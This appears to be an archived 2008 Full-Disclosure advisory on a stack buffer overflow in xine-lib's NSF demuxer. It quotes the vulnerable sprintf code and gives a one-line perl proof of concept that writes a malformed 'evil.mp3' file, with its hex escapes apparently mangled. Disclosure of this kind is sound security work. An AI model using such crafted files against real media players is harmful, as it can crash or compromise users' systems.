Home / exploitsPDF  

xinelib-overflow.txt

Posted on 18 April 2008

xine-lib <= 1.1.12 is prone to a stack-based buffer overflow in the NES Sound Format demuxer(demux_nsf.c). - Code open_nsf_file(): 109: this->title = strdup(&header[0x0E]); demux_nsf_send_chunk(): 122: char title[100]; 162: sprintf(title, "%s, song %d/%d", this->title, this->current_song, this->total_songs); - Affected applications http://xinehq.de/index.php/releases - PoC perl -e 'print "x4Ex45x53x4Dx1Ax01x01x01x80x80x18x8Ax03x8A" . "x41" x 114' > evil.mp3 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

 

TOP